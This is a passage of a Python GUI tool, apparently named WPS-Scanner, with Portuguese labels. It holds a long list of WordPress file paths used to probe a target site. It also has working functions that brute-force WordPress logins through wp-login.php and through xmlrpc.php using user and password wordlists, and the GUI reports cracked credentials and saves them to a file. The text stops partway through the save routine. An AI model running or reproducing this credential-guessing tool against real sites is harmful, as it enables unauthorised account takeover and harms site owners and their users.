    "wp-includes/sodium_compat/src/Crypto.php",
    "wp-includes/sodium_compat/src/File.php",
    "wp-includes/sodium_compat/src/Core32/Ed25519.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519.php",
    "wp-includes/sodium_compat/src/Core32/XSalsa20.php",
    "wp-includes/sodium_compat/src/Core32/Util.php",
    "wp-includes/sodium_compat/src/Core32/ChaCha20.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/README.md",
    "wp-includes/sodium_compat/src/Core32/Curve25519/H.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php",
    "wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php",
    "wp-includes/sodium_compat/src/Core32/XChaCha20.php",
    "wp-includes/sodium_compat/src/Core32/HSalsa20.php",
    "wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php",
    "wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php",
    "wp-includes/sodium_compat/src/Core32/BLAKE2b.php",
    "wp-includes/sodium_compat/src/Core32/Salsa20.php",
    "wp-includes/sodium_compat/src/Core32/Poly1305/State.php",
    "wp-includes/sodium_compat/src/Core32/X25519.php",
    "wp-includes/sodium_compat/src/Core32/Poly1305.php",
    "wp-includes/sodium_compat/src/Core32/HChaCha20.php",
    "wp-includes/sodium_compat/src/Core32/SipHash.php",
    "wp-includes/sodium_compat/src/Core32/Int64.php",
    "wp-includes/sodium_compat/src/Core32/Salsa20.php",
    "wp-includes/sodium_compat/src/Core32/Poly1305/State.php",
    "wp-includes/sodium_compat/src/Core32/XChaCha20.php",
    "wp-includes/sodium_compat/src/Core32/X25519.php",
    "wp-includes/sodium_compat/src/Core32/Poly1305.php",
    "wp-includes/sodium_compat/src/Core32/HChaCha20.php",
    "wp-includes/sodium_compat/src/Core32/SipHash.php",
    "wp-includes/sodium_compat/src/Core32/Int32.php",
    "wp-includes/sodium_compat/src/Core32/SecretStream/State.php",
    "wp-includes/sodium_compat/src/PHP52/SplFixedArray.php",
    "wp-includes/sodium_compat/LICENSE",
    "wp-includes/sodium_compat/autoload-php7.php",
    "wp-includes/sodium_compat/composer.json",
    "wp-includes/sodium_compat/namespaced/Compat.php",
    "wp-includes/sodium_compat/namespaced/Core/Ed25519.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519.php",
    "wp-includes/sodium_compat/namespaced/Core/Util.php",
    "wp-includes/sodium_compat/namespaced/Core/ChaCha20.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php",
    "wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php",
    "wp-includes/sodium_compat/namespaced/Core/XChaCha20.php",
    "wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php",
    "wp-includes/sodium_compat/namespaced/Core/ChaCha20.php",
    "wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php",
    "wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php",
    "wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php",
    "wp-includes/sodium_compat/namespaced/Core/Salsa20.php",
    "wp-includes/sodium_compat/namespaced/Core/Poly1305.php",
    "wp-includes/sodium_compat/namespaced/Core/X25519.php",
    "wp-includes/sodium_compat/namespaced/Crypto.php",
    "wp-includes/sodium_compat/namespaced/File.php",
    "wp-includes/sodium_compat/lib/ristretto255.php",
    "wp-includes/sodium_compat/lib/php72compat.php",
    "wp-includes/sodium_compat/lib/sodium_compat.php",
    "wp-includes/sodium_compat/lib/stream-xchacha20.php",
    "wp-includes/sodium_compat/lib/constants.php",
    "wp-includes/sodium_compat/lib/php84compat.php",
    "wp-includes/sodium_compat/lib/php84compat_const.php",
    "wp-includes/sodium_compat/lib/namespaced.php",
    "wp-includes/sodium_compat/lib/php72compat_const.php",
    "wp-includes/sodium_compat/autoload.php",
    "wp-includes/date.php",
    "wp-includes/class-wp-application-passwords.php",
    "wp-includes/l10n/class-wp-translation-controller.php",
    "wp-includes/l10n/class-wp-translation-file.php",
    "wp-includes/l10n/class-wp-translation-file-mo.php",
    "wp-includes/l10n/class-wp-translations.php",
    "wp-includes/l10n/class-wp-translation-file-php.php",
    "wp-includes/class-wp-block-patterns-registry.php",
    "wp-includes/pluggable.php",
    "wp-includes/theme.json",
    "wp-includes/post-formats.php",
    "wp-includes/category.php",
    "wp-includes/capabilities.php",
    "wp-includes/functions.wp-styles.php",
    "wp-includes/class-walker-comment.php",
    "wp-includes/class-wp-site-query.php",
    "wp-includes/style-engine.php",
    "wp-includes/class-wp-classic-to-block-menu-converter.php",
    "wp-includes/class-wp-simplepie-sanitize-kses.php",
    "wp-includes/taxonomy.php",
    "wp-includes/class-wp-network.php",
    "wp-includes/class-walker-category.php",
    "wp-includes/block-bindings/pattern-overrides.php",
    "wp-includes/block-bindings/post-meta.php",
    "wp-includes/class-wp-block-metadata-registry.php",
    "wp-includes/class-wp-http-curl.php",
    "wp-includes/class-wp-ajax-response.php",
    "wp-includes/class-wp-url-pattern-prefixer.php",
    "wp-includes/fonts/dashicons.woff",
    "wp-includes/fonts/dashicons.ttf",
    "wp-includes/fonts/dashicons.svg",
    "wp-includes/fonts/dashicons.woff2",
    "wp-includes/fonts/class-wp-font-face.php",
    "wp-includes/fonts/class-wp-font-face-resolver.php",
    "wp-includes/fonts/dashicons.eot",
    "wp-includes/fonts/class-wp-font-collection.php",
    "wp-includes/fonts/class-wp-font-library.php",
    "wp-includes/fonts/class-wp-font-utils.php",
    "wp-includes/embed-template.php",
    "wp-includes/theme.php",
    "wp-includes/feed-atom-comments.php",
    "wp-includes/class-wp-paused-extensions-storage.php",
    "wp-includes/class-wp-meta-query.php",
    "wp-includes/class-wp-role.php",
    "wp-includes/class-wp-image-editor-gd.php",
    "wp-includes/theme-i18n.json",
    "wp-includes/rss.php",
    "wp-includes/load.php",
    "wp-includes/class-wp-walker.php",
    "wp-includes/class-wp-recovery-mode.php",
    "wp-includes/nav-menu-template.php",
    "wp-includes/IXR/class-IXR-introspectionserver.php",
    "wp-includes/IXR/class-IXR-error.php",
    "wp-includes/IXR/class-IXR-base64.php",
    "wp-includes/IXR/class-IXR-clientmulticall.php",
    "wp-includes/IXR/class-IXR-request.php",
    "wp-includes/IXR/class-IXR-date.php",
    "wp-includes/IXR/class-IXR-client.php",
    "wp-includes/IXR/class-IXR-server.php",
    "wp-includes/IXR/class-IXR-message.php",
    "wp-includes/IXR/class-IXR-value.php",
    "wp-includes/class-wp-user-meta-session-tokens.php",
    "wp-includes/class-wp-simplepie-file.php",
    "wp-includes/class-pop3.php",
    "wp-includes/class-wp-theme-json-schema.php",
    "wp-includes/class-oembed.php",
    "wp-includes/class-wp-plugin-dependencies.php",
    "wp-includes/theme-compat/comments.php",
    "wp-includes/theme-compat/footer-embed.php",
    "wp-includes/theme-compat/header-embed.php",
    "wp-includes/theme-compat/footer.php",
    "wp-includes/theme-compat/embed-content.php",
    "wp-includes/theme-compat/embed.php",
    "wp-includes/theme-compat/header.php",
    "wp-includes/theme-compat/sidebar.php",
    "wp-includes/theme-compat/embed-404.php",
    "wp-includes/class-walker-category-dropdown.php",
    "wp-includes/class-walker-nav-menu.php",
    "wp-includes/class-wp-block-parser-frame.php",
    "wp-includes/class-wp-speculation-rules.php",
    "wp-includes/class-wp-navigation-fallback.php",
    "wp-includes/class.wp-styles.php",
    "wp-includes/class-wp-block-bindings-registry.php",
    "wp-includes/class-wp-list-util.php",
    "wp-includes/class-wp-block-supports.php",
    "wp-includes/class-wp-recovery-mode-link-service.php",
    "wp-includes/class-wp-post-type.php",
    "wp-includes/class.wp-scripts.php",
    "wp-includes/error-protection.php",
    "wp-includes/class-wp-theme-json-data.php",
    "wp-includes/rest-api.php",
    "wp-includes/class-wp-metadata-lazyloader.php",
    "wp-includes/class-wp-customize-setting.php",
    "wp-includes/class-wp-text-diff-renderer-inline.php",
    "wp-includes/block-editor.php",
    "wp-includes/class-wp-styles.php",
    "wp-includes/block-patterns.php",
    "wp-includes/class-wp-feed-cache.php",
    "wp-includes/class-wp-customize-widgets.php",
    "wp-includes/php-compat/readonly.php",
    "wp-includes/class-wp-widget.php",
    "wp-includes/class-wp.php",
    "wp-includes/nav-menu.php",
    "wp-includes/class-wp-dependencies.php",
    "wp-includes/class-wp-post.php",
    "wp-includes/theme-previews.php",
    "wp-includes/class-wp-phpmailer.php",
    "wp-includes/class-wp-term.php",
    "wp-includes/Text/Diff/Engine/shell.php",
    "wp-includes/Text/Diff/Engine/xdiff.php",
    "wp-includes/Text/Diff/Engine/string.php",
    "wp-includes/Text/Diff/Engine/native.php",
    "wp-includes/Text/Diff/Renderer/inline.php",
    "wp-includes/Text/Diff/Renderer.php",
    "wp-includes/Text/Diff.php",
    "wp-includes/Text/Exception.php",
    "wp-includes/category-template.php",
    "wp-includes/post-template.php",
    "wp-includes/template-loader.php",
    "wp-includes/deprecated.php",
    "wp-includes/class-simplepie.php",
    "wp-includes/post.php",
    "wp-includes/spl-autoload-compat.php",
    "wp-includes/canonical.php",
    "wp-includes/class-wp-site.php",
    "wp-includes/class-wp-customize-nav-menus.php",
    "wp-includes/class-wp-block-type.php",
    "wp-includes/rewrite.php",
    "wp-includes/class-wp-customize-manager.php",
    "wp-includes/class-phpmailer.php",
    "wp-includes/registration.php",
    "wp-includes/speculative-loading.php",
    "wp-links-opml.php",
    "wp-load.php",
    "wp-comments-post.php",
    "wp-blog-header.php",
    "xmlrpc.php",
    "license.txt",
    "wp-login.php",
    "wp-mail.php",
    "wp-content/themes/twentytwentytwo/readme.txt",
    "wp-content/themes/twentytwentytwo/functions.php",
    "wp-content/themes/twentytwentytwo/theme.json",
    "wp-content/themes/twentytwentytwo/index.php",
    "wp-content/themes/twentyten/comments.php",
    "wp-content/themes/twentyten/readme.txt",
    "wp-content/themes/twentyten/footer.php",
    "wp-content/themes/twentyten/404.php",
    "wp-content/themes/twentyten/archive.php",
    "wp-content/themes/twentyten/author.php",
    "wp-content/themes/twentyten/page.php",
    "wp-content/themes/twentyten/functions.php",
    "wp-content/themes/twentyten/header.php",
    "wp-content/themes/twentyten/loop.php",
    "wp-content/themes/twentyten/license.txt",
    "wp-content/themes/twentyten/single.php",
    "wp-content/themes/twentyten/sidebar.php",
    "wp-content/themes/twentyten/tag.php",
    "wp-content/themes/twentyten/category.php",
    "wp-content/themes/twentyten/index.php",
    "wp-content/themes/twentyfifteen/comments.php",
    "wp-content/themes/twentyfifteen/readme.txt",
    "wp-content/themes/twentyfifteen/footer.php",
    "wp-content/themes/twentyfifteen/404.php",
    "wp-content/themes/twentyfifteen/archive.php",
    "wp-content/themes/twentyfifteen/page.php",
    "wp-content/themes/twentyfifteen/functions.php",
    "wp-content/themes/twentyfifteen/header.php",
    "wp-content/themes/twentyfifteen/single.php",
    "wp-content/themes/twentyfifteen/sidebar.php",
    "wp-content/themes/twentyfifteen/search.php",
    "wp-content/themes/twentyfifteen/index.php",
    "wp-content/themes/twentyseventeen/comments.php",
    "wp-content/themes/twentyseventeen/readme.txt",
    "wp-content/themes/twentyseventeen/footer.php",
    "wp-content/themes/twentyseventeen/404.php",
    "wp-content/themes/twentyseventeen/archive.php",
    "wp-content/themes/twentyseventeen/page.php",
    "wp-content/themes/twentyseventeen/functions.php",
    "wp-content/themes/twentyseventeen/header.php",
    "wp-content/themes/twentyseventeen/front-page.php",
    "wp-content/themes/twentyseventeen/single.php",
    "wp-content/themes/twentyseventeen/sidebar.php",
    "wp-content/themes/twentyseventeen/search.php",
    "wp-content/themes/twentyseventeen/searchform.php",
    "wp-content/themes/twentyseventeen/index.php",
    "wp-content/themes/twentytwelve/comments.php",
    "wp-content/themes/twentytwelve/readme.txt",
    "wp-content/themes/twentytwelve/footer.php",
    "wp-content/themes/twentytwelve/404.php",
    "wp-content/themes/twentytwelve/archive.php",
    "wp-content/themes/twentytwelve/author.php",
    "wp-content/themes/twentytwelve/page.php",
    "wp-content/themes/twentytwelve/functions.php",
    "wp-content/themes/twentytwelve/header.php",
    "wp-content/themes/twentytwelve/single.php",
    "wp-content/themes/twentytwelve/sidebar.php",
    "wp-content/themes/twentytwelve/tag.php",
    "wp-content/themes/twentytwelve/category.php",
    "wp-content/themes/twentytwelve/search.php",
    "wp-content/themes/twentytwelve/index.php",
    "wp-content/themes/twentytwenty/comments.php",
    "wp-content/themes/twentytwenty/readme.txt",
    "wp-content/themes/twentytwenty/footer.php",
    "wp-content/themes/twentytwenty/404.php",
    "wp-content/themes/twentytwenty/functions.php",
    "wp-content/themes/twentytwenty/singular.php",
    "wp-content/themes/twentytwenty/header.php",
    "wp-content/themes/twentytwenty/searchform.php",
    "wp-content/themes/twentytwenty/index.php",
    "wp-content/themes/twentythirteen/comments.php",
    "wp-content/themes/twentythirteen/readme.txt",
    "wp-content/themes/twentythirteen/footer.php",
    "wp-content/themes/twentythirteen/404.php",
    "wp-content/themes/twentythirteen/archive.php",
    "wp-content/themes/twentythirteen/author.php",
    "wp-content/themes/twentythirteen/page.php",
    "wp-content/themes/twentythirteen/functions.php",
    "wp-content/themes/twentythirteen/header.php",
    "wp-content/themes/twentythirteen/single.php",
    "wp-content/themes/twentythirteen/sidebar.php",
    "wp-content/themes/twentythirteen/tag.php",
    "wp-content/themes/twentythirteen/category.php",
    "wp-content/themes/twentythirteen/search.php",
    "wp-content/themes/twentythirteen/index.php",
    "wp-content/themes/twentynineteen/comments.php",
    "wp-content/themes/twentynineteen/readme.txt",
    "wp-content/themes/twentynineteen/footer.php",
    "wp-content/themes/twentynineteen/404.php",
    "wp-content/themes/twentynineteen/archive.php",
    "wp-content/themes/twentynineteen/page.php",
    "wp-content/themes/twentynineteen/functions.php",
    "wp-content/themes/twentynineteen/header.php",
    "wp-content/themes/twentynineteen/single.php",
    "wp-content/themes/twentynineteen/search.php",
    "wp-content/themes/twentynineteen/index.php",
    "wp-content/themes/twentynineteen/image.php",
    "wp-content/themes/twentytwentyfour/readme.txt",
    "wp-content/themes/twentytwentyfour/functions.php",
    "wp-content/themes/twentytwentyfour/theme.json",
    "wp-content/themes/twentytwentythree/readme.txt",
    "wp-content/themes/twentytwentythree/theme.json",
    "wp-content/themes/twentyfourteen/comments.php",
    "wp-content/themes/twentyfourteen/readme.txt",
    "wp-content/themes/twentyfourteen/footer.php",
    "wp-content/themes/twentyfourteen/404.php",
    "wp-content/themes/twentyfourteen/archive.php",
    "wp-content/themes/twentyfourteen/author.php",
    "wp-content/themes/twentyfourteen/page.php",
    "wp-content/themes/twentyfourteen/functions.php",
    "wp-content/themes/twentyfourteen/header.php",
    "wp-content/themes/twentyfourteen/featured-content.php",
    "wp-content/themes/twentyfourteen/content.php",
    "wp-content/themes/twentyfourteen/single.php",
    "wp-content/themes/twentyfourteen/sidebar.php",
    "wp-content/themes/twentyfourteen/tag.php",
    "wp-content/themes/twentyfourteen/category.php",
    "wp-content/themes/twentyfourteen/search.php",
    "wp-content/themes/twentyfourteen/index.php",
    "wp-content/themes/twentyeleven/showcase.php",
    "wp-content/themes/twentyeleven/comments.php",
    "wp-content/themes/twentyeleven/readme.txt",
    "wp-content/themes/twentyeleven/footer.php",
    "wp-content/themes/twentyeleven/404.php",
    "wp-content/themes/twentyeleven/archive.php",
    "wp-content/themes/twentyeleven/author.php",
    "wp-content/themes/twentyeleven/page.php",
    "wp-content/themes/twentyeleven/functions.php",
    "wp-content/themes/twentyeleven/header.php",
    "wp-content/themes/twentyeleven/license.txt",
    "wp-content/themes/twentyeleven/single.php",
    "wp-content/themes/twentyeleven/sidebar.php",
    "wp-content/themes/twentyeleven/search.php",
    "wp-content/themes/twentyeleven/index.php",
    "wp-content/themes/twentyeleven/image.php",
    "wp-content/themes/index.php",
    "wp-content/themes/twentytwentyone/comments.php",
    "wp-content/themes/twentytwentyone/readme.txt",
    "wp-content/themes/twentytwentyone/footer.php",
    "wp-content/themes/twentytwentyone/404.php",
    "wp-content/themes/twentytwentyone/archive.php",
    "wp-content/themes/twentytwentyone/page.php",
    "wp-content/themes/twentytwentyone/functions.php",
    "wp-content/themes/twentytwentyone/header.php",
    "wp-content/themes/twentytwentyone/single.php",
    "wp-content/themes/twentytwentyone/search.php",
    "wp-content/themes/twentytwentyone/searchform.php",
    "wp-content/themes/twentytwentyone/index.php",
    "wp-content/themes/twentytwentyone/image.php",
    "wp-content/themes/twentytwentyfive/readme.txt",
    "wp-content/themes/twentytwentyfive/functions.php",
    "wp-content/themes/twentytwentyfive/theme.json",
    "wp-content/themes/twentysixteen/comments.php",
    "wp-content/themes/twentysixteen/readme.txt",
    "wp-content/themes/twentysixteen/footer.php",
    "wp-content/themes/twentysixteen/404.php",
    "wp-content/themes/twentysixteen/archive.php",
    "wp-content/themes/twentysixteen/page.php",
    "wp-content/themes/twentysixteen/functions.php",
    "wp-content/themes/twentysixteen/header.php",
    "wp-content/themes/twentysixteen/single.php",
    "wp-content/themes/twentysixteen/sidebar.php",
    "wp-content/themes/twentysixteen/search.php",
    "wp-content/themes/twentysixteen/searchform.php",
    "wp-content/themes/twentysixteen/index.php",
    "wp-content/themes/twentysixteen/image.php",
    "wp-content/plugins/hello.php",
    "wp-content/plugins/index.php",
    "wp-content/index.php",
    "wp-config-sample.php",
    "wp-cron.php",
    "wp-admin/install-helper.php",
    "wp-admin/revision.php",
    "wp-admin/themes.php",
    "wp-admin/site-health.php",
    "wp-admin/erase-personal-data.php",
    "wp-admin/privacy-policy-guide.php",
    "wp-admin/install.php",
    "wp-admin/post-new.php",
    "wp-admin/async-upload.php",
    "wp-admin/customize.php",
    "wp-admin/options.php",
    "wp-admin/options-media.php",
    "wp-admin/edit-form-comment.php",
    "wp-admin/tools.php",
    "wp-admin/admin.php",
    "wp-admin/ms-users.php",
    "wp-admin/admin-footer.php",
    "wp-admin/options-privacy.php",
    "wp-admin/freedoms.php",
    "wp-admin/credits.php",
    "wp-admin/about.php",
    "wp-admin/media-upload.php",
    "wp-admin/authorize-application.php",
    "wp-admin/menu.php",
    "wp-admin/plugin-install.php",
    "wp-admin/update.php",
    "wp-admin/press-this.php",
    "wp-admin/admin-post.php",
    "wp-admin/site-editor.php",
    "wp-admin/import.php",
    "wp-admin/ms-admin.php",
    "wp-admin/theme-install.php",
    "wp-admin/ms-edit.php",
    "wp-admin/widgets-form.php",
    "wp-admin/options-head.php",
    "wp-admin/nav-menus.php",
    "wp-admin/privacy.php",
    "wp-admin/user-edit.php",
    "wp-admin/user-new.php",
    "wp-admin/ms-delete-site.php",
    "wp-admin/custom-header.php",
    "wp-admin/ms-upgrade-network.php",
    "wp-admin/edit-link-form.php",
    "wp-admin/widgets.php",
    "wp-admin/update-core.php",
    "wp-admin/plugin-editor.php",
    "wp-admin/options-permalink.php",
    "wp-admin/options-writing.php",
    "wp-admin/load-scripts.php",
    "wp-admin/moderation.php",
    "wp-admin/media.php",
    "wp-admin/link.php",
    "wp-admin/edit-form-advanced.php",
    "wp-admin/term.php",
    "wp-admin/my-sites.php",
    "wp-admin/ms-themes.php",
    "wp-admin/network/themes.php",
    "wp-admin/network/settings.php",
    "wp-admin/network/admin.php",
    "wp-admin/network/freedoms.php",
    "wp-admin/network/credits.php",
    "wp-admin/network/about.php",
    "wp-admin/network/menu.php",
    "wp-admin/network/plugin-install.php",
    "wp-admin/network/update.php",
    "wp-admin/network/theme-install.php",
    "wp-admin/network/privacy.php",
    "wp-admin/network/site-themes.php",
    "wp-admin/network/user-edit.php",
    "wp-admin/network/user-new.php",
    "wp-admin/network/site-settings.php",
    "wp-admin/network/update-core.php",
    "wp-admin/network/plugin-editor.php",
    "wp-admin/network/setup.php",
    "wp-admin/network/contribute.php",
    "wp-admin/network/sites.php",
    "wp-admin/network/site-users.php",
    "wp-admin/network/profile.php",
    "wp-admin/network/plugins.php",
    "wp-admin/network/index.php",
    "wp-admin/network/upgrade.php",
    "wp-admin/network/site-info.php",
    "wp-admin/network/theme-editor.php",
    "wp-admin/network/edit.php",
    "wp-admin/network/users.php",
    "wp-admin/network/site-new.php",
    "wp-admin/admin-functions.php",
    "wp-admin/ms-sites.php",
    "wp-admin/export-personal-data.php",
    "wp-admin/link-manager.php",
    "wp-admin/contribute.php",
    "wp-admin/comment.php",
    "wp-admin/options-reading.php",
    "wp-admin/export.php",
    "wp-admin/link-add.php",
    "wp-admin/widgets-form-blocks.php",
    "wp-admin/menu-header.php",
    "wp-admin/network.php",
    "wp-admin/edit-tags.php",
    "wp-admin/user/admin.php",
    "wp-admin/user/freedoms.php",
    "wp-admin/user/credits.php",
    "wp-admin/user/about.php",
    "wp-admin/user/menu.php",
    "wp-admin/user/privacy.php",
    "wp-admin/user/user-edit.php",
    "wp-admin/user/contribute.php",
    "wp-admin/user/profile.php",
    "wp-admin/user/index.php",
    "wp-admin/load-styles.php",
    "wp-admin/upload.php",
    "wp-admin/profile.php",
    "wp-admin/admin-ajax.php",
    "wp-admin/options-general.php",
    "wp-admin/plugins.php",
    "wp-admin/maint/repair.php",
    "wp-admin/options-discussion.php",
    "wp-admin/index.php",
    "wp-admin/upgrade.php",
    "wp-admin/site-health-info.php",
    "wp-admin/admin-header.php",
    "wp-admin/setup-config.php",
    "wp-admin/ms-options.php",
    "wp-admin/theme-editor.php",
    "wp-admin/edit.php",
    "wp-admin/upgrade-functions.php",
    "wp-admin/link-parse-opml.php",
    "wp-admin/users.php",
    "wp-admin/media-new.php",
    "wp-admin/custom-background.php",
    "wp-admin/edit-tag-form.php",
    "wp-admin/edit-form-blocks.php",
    "wp-admin/edit-comments.php",
    "wp-admin/post.php",
    "wp-trackback.php",
    "wp-settings.php",
    "wp-signup.php",
    "index.php",
    "readme.html",
]

# ==================== BRUTE FORCE ====================
def bf_login(base, user, pwd, results, log_func):
    s = requests.Session()
    try:
        r = s.get(base.rstrip("/") + "/wp-login.php", timeout=15, verify=False, allow_redirects=True)
        soup = BeautifulSoup(r.text, "html.parser")
        data = {
            "log": user, "pwd": pwd, "rememberme": "forever",
            "wp-submit": "Log In", "redirect_to": base + "/wp-admin/", "testcookie": "1"
        }
        for inp in soup.find_all("input"):
            n, v = inp.get("name"), inp.get("value")
            if n and n not in data and v:
                data[n] = v
        r2 = s.post(base.rstrip("/") + "/wp-login.php", data=data, timeout=15, verify=False, allow_redirects=True)
        if "wp-admin" in (r2.url or "") or "dashboard" in r2.text[:4000].lower():
            log_func(f"\n!!! SUCESSO: Usuario = {user:<15} Senha = {pwd}\n", "orange")
            results.append((user, pwd))
            return True
    except Exception:
        pass
    return False

def bf_xmlrpc(base, user, pwd):
    xml = f"""<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName>
<params><param><value>{user}</value></param><param><value>{pwd}</value></param></params></methodCall>"""
    try:
        r = requests.post(base.rstrip("/") + "/xmlrpc.php", data=xml, timeout=15, verify=False, headers=UA)
        if "200 OK" in r.text or "<name>blogid" in r.text.lower():
            return True
    except Exception:
        pass
    return False

# ==================== GUI ====================
class App:
    def __init__(self, root):
        self.root = root
        root.title("WPS-Scanner")
        root.geometry("1200x860")
        root.update_idletasks()
        w, h = 1200, 860
        x = (root.winfo_screenwidth() - w) // 2
        y = (root.winfo_screenheight() - h) // 2
        root.geometry(f"{w}x{h}+{x}+{y}")

        frm = ttk.Frame(root, padding=10)
        frm.place(relx=0.5, rely=0.5, anchor="center")
        for c in range(4):
            frm.columnconfigure(c, weight=1)

        ttk.Label(frm, text=f"URL alvo: {URL_FIXA}").grid(row=0, column=0, columnspan=4, sticky="n")
        self.url = ttk.Entry(frm, width=60)
        self.url.insert(0, URL_FIXA)
        self.url.grid(row=1, column=0, columnspan=4, pady=5)

        ttk.Label(frm, text="Wordlist de senhas:").grid(row=2, column=0, columnspan=4, sticky="n")
        self.wl = ttk.Entry(frm, width=50)
        self.wl.grid(row=3, column=0, columnspan=2, sticky="we", pady=5)
        ttk.Button(frm, text="Procurar...", command=self.pick).grid(row=3, column=2, padx=5)

        ttk.Label(frm, text="Usuários (1 por linha ou wordlist):").grid(row=4, column=0, columnspan=4, sticky="n")
        self.users = tk.Text(frm, height=6, width=60)
        self.users.grid(row=5, column=0, columnspan=2, sticky="we", pady=5)
        ttk.Button(frm, text="Carregar wordlist", command=self.pick_users).grid(row=5, column=2, padx=5)

        ttk.Label(frm, text="Método:").grid(row=6, column=0, sticky="e")
        self.method = ttk.Combobox(frm, values=["wp-login", "xmlrpc"], state="readonly")
        self.method.current(0)
        self.method.grid(row=6, column=1, sticky="w", padx=5)

        ttk.Label(frm, text="Threads:").grid(row=6, column=2, sticky="e")
        self.threads_v = tk.StringVar(value="5")
        ttk.Entry(frm, width=5, textvariable=self.threads_v).grid(row=6, column=3, sticky="w")

        btns = ttk.Frame(frm)
        btns.grid(row=7, column=0, columnspan=4, pady=15)
        for c in range(4):
            btns.columnconfigure(c, weight=1)
        ttk.Button(btns, text="1) Scan de arquivos", command=self.scan_files).grid(row=0, column=0, padx=4, sticky="we")
        ttk.Button(btns, text="2) Brute Force", command=self.brute).grid(row=0, column=1, padx=4, sticky="we")
        ttk.Button(btns, text="3) Salvar scan em .txt", command=self.save_scan).grid(row=0, column=2, padx=4, sticky="we")
        ttk.Button(btns, text="4) Salvar senhas em .txt", command=self.save_results).grid(row=0, column=3, padx=4, sticky="we")

        # ---------- Painel de saída com SCROLLBAR do lado direito ----------
        out_frame = ttk.Frame(frm)
        out_frame.grid(row=8, column=0, columnspan=4, sticky="nsew")

        self.out = tk.Text(out_frame, height=25, width=140, state="disabled", bg="#111", fg="#0f0",
                           font=("Consolas", 10), yscrollcommand=self._on_scroll)
        self.out.grid(row=0, column=0, sticky="nsew")

        self.scrollbar = ttk.Scrollbar(out_frame, orient="vertical", command=self._on_yview)
        self.scrollbar.grid(row=0, column=1, sticky="ns")

        out_frame.rowconfigure(0, weight=1)
        out_frame.columnconfigure(0, weight=1)

        self.out.tag_config("orange", foreground="orange", font=("Consolas", 10, "bold"))
        self.out.tag_config("red", foreground="red")
        self.out.tag_config("cyan", foreground="cyan")

        self.found = []              # (usuario, senha) quebrados
        self.found_users = set()     # usuários já quebrados
        self.scan_results = []       # [(url, status)] do scan de arquivos
        self.stop_event = threading.Event()
        self.lock = threading.Lock()

        self.log(f"✅ WP-Scanner carregado! Alvo: {URL_FIXA} ({len(WORDPRESS_PATHS)} caminhos no scan)\n")

    # ---------- Scrollbar sync ----------
    def _on_scroll(self, first, last):
        self.scrollbar.set(first, last)

    def _on_yview(self, *args):
        self.out.yview(*args)

    # ---------- Log ----------
    def log(self, msg, color=None):
        def _do():
            self.out.configure(state="normal")
            self.out.insert("end", msg + "\n", color) if color else self.out.insert("end", msg + "\n")
            self.out.see("end")
            self.out.configure(state="disabled")
        self.root.after(0, _do)

    # ---------- File dialogs ----------
    def pick(self):
        p = filedialog.askopenfilename(title="Wordlist", filetypes=[("Texto", "*.txt"), ("Todos", "*.*")])
        if p:
            self.wl.delete(0, "end")
            self.wl.insert(0, p)

    def pick_users(self):
        p = filedialog.askopenfilename(title="Wordlist de Usuários", filetypes=[("Texto", "*.txt"), ("Todos", "*.*")])
        if p:
            try:
                with open(p, "r", encoding="utf-8", errors="ignore") as f:
                    content = f.read()
                self.users.delete("1.0", "end")
                self.users.insert("1.0", content)
                n = len([u for u in content.splitlines() if u.strip()])
                self.log(f"[*] Wordlist de usuários carregada: {n} usuários")
            except Exception as e:
                messagebox.showerror("Erro", f"Não foi possível ler o arquivo: {e}")

    # ---------- Salvar resultados do SCAN DE ARQUIVOS em .txt ----------
    def save_scan(self):
        if not self.scan_results:
            messagebox.showinfo("Aviso", "Nenhum resultado de scan ainda. Execute o 'Scan de arquivos' primeiro.")
            return
        p = filedialog.asksaveasfilename(
            title="Salvar scan",
            defaultextension=".txt",
            filetypes=[("Texto", "*.txt")],
            initialfile="scan_arquivos.txt"
        )
        if not p:
            return
        try:
            with open(p, "w", encoding="utf-8") as f:
                f.write(f"# WP-Scanner — Scan de arquivos ({len(self.scan_results)} encontrados)\n")
                f.write(f"# Data: {__import__('datetime').datetime.now().strftime('%d/%m/%Y %H:%M:%S')}\n")
                f.write(f"# Alvo: {self.url.get().strip()}\n\n")
                for url, status in self.scan_results:
                    f.write(f"[{status}] {url}\n")
            self.log(f"[✓] Scan salvo em: {p} ({len(self.scan_results)} arquivos)", "orange")
            messagebox.showinfo("Sucesso", f"Scan salvo em:\n{p}")
        except Exception as e:
            messagebox.showerror("Erro", f"Não foi possível salvar: {e}")

    # ---------- Salvar credenciais encontradas em .txt ----------
    def save_results(self):
        if not self.found:
            messagebox.showinfo("Aviso", "Nenhuma credencial encontrada ainda para salvar.")
            return
        p = filedialog.asksaveasfilename(
            title="Salvar senhas",
            defaultextension=".txt",
            filetypes=[("Texto", "*.txt")],
            initialfile="senhas_encontradas.txt"
        )
        if not p:
            return
        try:
            with open(p, "w", encoding="utf-8") as f:
                f.write(f"# WP-Scanner — Resultados ({len(self.found)} credenciais)\n")
                f.write(f"# Data: {__import__('datetime').datetime.now().strftime('%d/%m/%Y %H:%M:%S')}\n")
                f.write(f"# Alvo: {self.url.get().strip()}\n\n")
                for u, pw in self.found:
